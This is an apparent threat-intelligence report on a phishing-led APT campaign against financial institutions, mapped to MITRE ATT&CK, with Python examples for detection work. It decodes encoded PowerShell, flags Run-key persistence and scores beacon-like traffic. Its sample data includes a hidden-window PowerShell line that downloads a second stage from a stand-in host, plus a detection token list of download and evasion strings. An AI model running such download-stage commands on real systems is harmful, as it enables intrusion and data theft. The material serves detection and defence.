Nina Kovacs — Exploit Research Analyst
Key Takeaways
- APT groups are increasingly leveraging sophisticated phishing techniques to initiate attacks on financial institutions.
- We identified the use of the PowerShell scripting language to establish persistence and evade detection.
- The implemented command and control infrastructure relied on HTTPS, enabling stealthy communication with compromised hosts.
Executive Summary
In our recent investigation into a targeted attack against several financial institutions, we discovered that a sophisticated actor used a multi-faceted approach to compromise hosts and exfiltrate sensitive data. The attack exhibited tactics consistent with advanced persistent threats (APTs), particularly in its initial access phase, which allowed the implant to gain and maintain a foothold in the network. Throughout our analysis, we observed a range of MITRE ATT&CK tactics and techniques being employed to run the operation efficiently. Each stage reflected evolving tradecraft that highlighted the actor’s significant capabilities and intent.
Initial Access
The initial access phase was facilitated through tailored phishing emails targeting specific employees within the institutions. Our analysis revealed that these emails contained malicious links leading to a well-constructed landing page. There, the user was prompted to download a disguised document, which was in fact a trojanized Microsoft Office file. Once the document was opened and macros were enabled, a downloader was deployed that fetched the primary payload from a command-and-control (C2) server. The technique employed aligns with T1566 – Phishing, where initial access is achieved via deceptive communications.
Execution & Persistence
Upon successful execution of the trojanized document, the payload initiated a series of PowerShell commands that allowed the actor to download additional components silently. During our investigation, we observed the creation of a value under the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, establishing persistence for as long as the user profile was active. This technique maps to T1547.001 – Registry Run Keys / Startup Folder. The implant used encoded PowerShell commands, obfuscating their content and avoiding detection by common security solutions.
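The encoded PowerShell described above is a good place for a detection check: the -EncodedCommand switch carries base64 of the script's UTF-16LE bytes, so a process-creation log can be decoded and inspected before an analyst ever reads the raw command line. The following is an added example written for this page, not tooling from the report or the investigated environment; the sample command lines, the placeholder.invalid host and the token list are constructed for illustration.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so -e, -ec, -en
# and -enc are all seen in process-creation logs. The capture group is the base64 blob.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Substrings that commonly mark a download stage or console hiding once decoded.
# This list is an assumption for the example; tune it to the environment.
SUSPICIOUS_TOKENS = (
    "downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
    "invoke-expression", "iex ", "frombase64string", "-w hidden",
    "windowstyle hidden", "bypass",
)


def encode_powershell(script: str) -> str:
    """Build the form PowerShell expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        # Malformed base64 or non-UTF-16 payload: surface it to the analyst, do not crash.
        return None


def assess_command_line(cmdline: str) -> dict:
    """Decode any encoded command and report which suspicious tokens appear in either form."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    indicators = [tok for tok in SUSPICIOUS_TOKENS if tok in haystack]
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": indicators,
        # Encoding alone is a weak signal (admins use it too); content decides.
        "suspicious": bool(indicators),
    }


# Constructed sample process-creation command lines (not indicators from the report).
SAMPLE_LINES = [
    "powershell.exe -NoProfile -Command Get-Date",
    "powershell.exe -NoProfile -enc " + encode_powershell("Write-Host 'maintenance window'"),
    "powershell.exe -w hidden -EncodedCommand " + encode_powershell(
        "(New-Object Net.WebClient).DownloadString('https://placeholder.invalid/stage2')"),
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(assess_command_line(line))
```

The check searches both the raw command line and the decoded script, because flags such as a hidden window style sit outside the encoded blob while the download logic sits inside it. Treating "encoded" on its own as malicious produces noise from legitimate administration scripts, which is why the verdict is driven by the decoded content.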
Command and Control
Communication between the compromised hosts and the actor’s C2 infrastructure was conducted over HTTPS, camouflaging the traffic to evade traditional network detection mechanisms. Analysis of the beaconing behavior indicated periodic connections to a domain with an apparently legitimate registration, enhancing the actor’s operational security. We identified domains that had been configured to change regularly, showcasing a robust rotation pattern. The observed traffic maps to T1071.001 – Application Layer Protocol: Web Protocols; the hidden communication was not only stealthy but also resilient.
Lateral Movement & Discovery
Once a foothold was established, the attacker engaged in lateral movement, using SMB and WMI protocols to explore the internal network environment. Tools such as PsExec were utilized to deploy additional payloads across various endpoints. We noted the enumeration of user accounts and system information through commands like net user and systeminfo, aligning the campaign with T1087 – Account Discovery. This granted the actor further insights into the network’s architecture, enabling tailored follow-up actions.
Impact & Objectives
Ultimately, the actor aimed to exfiltrate sensitive financial data, including customer information and transaction records. The infections allowed the actor not only to steal data but also to gain considerable access rights, stressing the importance of robust insider threat protection. The primary goal, observed consistently, was to infiltrate the data repositories, breach confidentiality and potentially profit from the stolen information.
MITRE ATT&CK Mapping
- T1566 – Phishing: Initial compromise through crafted emails.
- T1547.001 – Registry Run Keys / Startup Folder: Persistence established via registry modifications.
- T1071.001 – Application Layer Protocol: Web Protocols: Command and control traffic hidden under HTTPS.
- T1087 – Account Discovery: Lateral movement leveraging user account enumeration.
Detection Opportunities
- Implement monitoring for registry modifications under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to detect persistence mechanisms.
- Review email security protocols and monitor for indicators of phishing attempts with distinct attachment types.
- Audit network traffic for unusual HTTPS connections that could signify malicious C2 communications.
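The first and third detection opportunities above can be exercised against exported telemetry. The following added example (written for this page, not code from the report) takes constructed Sysmon-style registry events and constructed proxy log lines, flags value writes under the Run key, and scores each source/destination pair for beacon-like regularity. The SIDs, hostnames, value names and the coefficient-of-variation threshold are assumptions made for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Sysmon records HKEY_CURRENT_USER under the user's SID, so the report's HKCU\...\Run
# path appears as HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Run\<value name>.
RUN_KEY = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\")

# Constructed Sysmon-style registry events (EventID 13 = registry value set,
# EventID 12 = key created or deleted). Paths, SIDs and value data are made up.
REGISTRY_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\SyncHelper",
     "Details": "powershell.exe -w hidden -enc <base64 placeholder>"},
    {"EventID": 12, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run",
     "Details": ""},
]


def find_run_key_writes(events):
    """Return value-set events whose target sits under a Run key (persistence candidates)."""
    return [e for e in events if e["EventID"] == 13 and RUN_KEY.search(e["TargetObject"])]


def make_sample_proxy_lines():
    """Constructed proxy log lines: '<ISO time> <src ip> <dst host> <port> <bytes>'."""
    base = datetime(2024, 5, 2, 9, 0, 0)
    lines = []
    # One host checking in roughly every 5 minutes with a few seconds of jitter.
    for i in range(8):
        t = base + timedelta(seconds=300 * i + (i % 3) * 4)
        lines.append(f"{t.isoformat()} 10.0.0.5 cdn-sync.example.invalid 443 1320")
    # Ordinary browsing from another host: irregular gaps between connections.
    for off in (12, 95, 130, 800, 1900, 2100, 2107):
        t = base + timedelta(seconds=off)
        lines.append(f"{t.isoformat()} 10.0.0.7 www.example.invalid 443 48211")
    return lines


def detect_beacons(lines, min_connections=5, max_cv=0.2):
    """Flag (src, dst) pairs whose inter-connection intervals are suspiciously regular."""
    seen = defaultdict(list)
    for line in lines:
        ts, src, dst, _port, _size = line.split()
        seen[(src, dst)].append(datetime.fromisoformat(ts))
    flagged = {}
    for pair, stamps in seen.items():
        if len(stamps) < min_connections:
            continue  # too few samples to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean  # coefficient of variation: low means regular
        if cv <= max_cv:
            flagged[pair] = {"count": len(stamps), "mean_interval": mean, "cv": cv}
    return flagged


if __name__ == "__main__":
    for event in find_run_key_writes(REGISTRY_EVENTS):
        print("Run key write:", event["Image"], "->", event["TargetObject"])
    for pair, stats in detect_beacons(make_sample_proxy_lines()).items():
        print("Beacon candidate:", pair, stats)
```

Two caveats a practitioner would add: legitimate software (update checks, mail sync, monitoring agents) also beacons on a fixed schedule, so a destination allowlist belongs in front of the beacon check, and an implant that adds large random jitter will push the coefficient of variation above the threshold, so the threshold is a tuning knob rather than a fixed rule. The registry check deliberately keys on EventID 13 only; the EventID 12 key-creation event on its own does not tell you what value was written.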
Analyst Notes
This campaign highlights the resilience and sophistication level of APT actors targeting financial institutions. It underscores the necessity for vigilance against not only the technical execution of the attacks but also against social engineering tactics employed to gain initial access. Continuous enhancements in detection methodologies and response procedures are critical to counteract such evolving threats.
Source: Original Report